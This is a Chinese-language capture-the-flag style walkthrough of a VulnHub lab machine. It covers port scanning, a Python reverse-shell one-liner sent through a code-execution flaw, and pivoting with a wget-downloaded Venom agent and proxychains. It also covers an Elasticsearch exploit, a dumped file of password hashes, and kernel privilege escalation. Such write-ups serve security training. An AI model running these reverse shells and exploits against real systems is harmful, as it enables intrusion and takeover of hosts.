靶机信息
https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
主机、端口、服务
- 主机发现 arp-scan -l
- nmap -sP 192.168.0.1/24
- 端口发现 - nmap -p- 192.168.0.102
- 服务发现nmap -p22,5000 -sV 192.168.0.102
服务发现
目标主机开启了5000端口,服务为werkzeug。
目标网站渗透
- 浏览器打开http://192.168.0.102:5000
-
使用扫描工具先进行路径扫描,发现存在/admin目录
image.png - http://192.168.0.102:5000/admin 目录中存在代码执行漏洞,目标系统为python,可能为python代码,需要用到python反弹shell
- nc监听端口 nc -nvlp 4444
- 反弹shell ,拿到权限
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.102",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
image.png
判断目标服务器是否为docker
内网扫描
/app # for i in $(seq 1 10); do ping -c 1 172.17.0.$i;done
PING 172.17.0.1 (172.17.0.1): 56 data bytes
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.036 ms
--- 172.17.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.036/0.036/0.036 ms
PING 172.17.0.2 (172.17.0.2): 56 data bytes
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.041 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.041/0.041/0.041 ms
PING 172.17.0.3 (172.17.0.3): 56 data bytes
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.124 ms
--- 172.17.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.124/0.124/0.124 ms
PING 172.17.0.4 (172.17.0.4): 56 data bytes
内网渗透
- 基本原理:使用代理工具,建立kali与内网机器的一条隧道,将kali与内网机器打通,kali中的工具可以通过该隧道进行工作。
- Vemon基本步骤:
- 将agent拷贝到目标主机;使用 python3 -m http.server 80 在主机建立http服务;
- 在目标内网服务器中使用wget http://192.168.0.103/a下载agent,可执行权限chmod +x a
- 开启vemon服务端 ./admin_linux_x64 -lport 9999
- 开启vemon客户端 ./a -rhost 192.168.0.103 -rport 9999
- venom:
┌──(kali㉿kali)-[~/Desktop/tmp/Venom v1.1.0]
└─$ ./admin_linux_x64 -lport 9999
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>>
[+]Remote connection: 192.168.0.101:55035
[+]A new node connect to admin node success
(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1
node 1
(node 1) >>> socks 1080
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>>
配置proxychain
sudo vi /etc/proxychains4.conf
socks5 127.0.0.1 1080使用nmap工具扫描内网地址
proxychain4 nmap -Pn 172.17.0.1
proxychain4 nmap -p22,5000 -sV 172.17.0.1
发现 172.17.0.1是192.168.0.102的内网地址扫描其他主机
proxychains4 nmap -p9200 -sV 172.17.0.2
扫描出开放9200端口,运行es服务使用es渗透脚本,拿到172.17.0.2的权限
┌──(kali㉿kali)-[~]
└─$ searchsploit Elasticsearch
----------------------- ---------------------------------
Exploit Title | Path
----------------------- ---------------------------------
ElasticSearch - Remote | linux/remote/36337.py
ElasticSearch - Remote | multiple/webapps/33370.html
ElasticSearch - Search | java/remote/36415.rb
ElasticSearch 1.6.0 - | linux/webapps/38383.py
ElasticSearch < 1.4.5 | php/webapps/37054.py
ElasticSearch Dynamic | java/remote/33588.rb
----------------------- ---------------------------------
Shellcodes: No Results
cp /usr/share/exploitdb/exploits/php/webapps/36337.py .
proxychains4 python 36337.py 172.17.0.2
- 检查服务器文件,有一个passwords文件
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814 1337hack
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
- 登录目标服务器192.168.0.102,john账号是用户,非root,考虑通过内核漏洞提权。
内核提权
- 检查内核信息:
uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
- 检查linux 3.13内核漏洞:searchsploit 3.13
- 检查漏洞利用脚本37292.c,其中有涉及到gcc二次编译的内容,删除gcc命令相关的代码,将涉及编译的ofs-lib.so文件直接拷贝到同级目录中;
- 编译修改好的漏洞脚本
-
通过wget将编译好的脚本及ofs-lib.so文件直接上传到靶机,即可拿到root权限。
靶机上操作
知识点总结:
- 主机、端口、服务扫描
- web目录扫描
- python反弹shell
- 内网扫描、内网穿透
- 内核提权
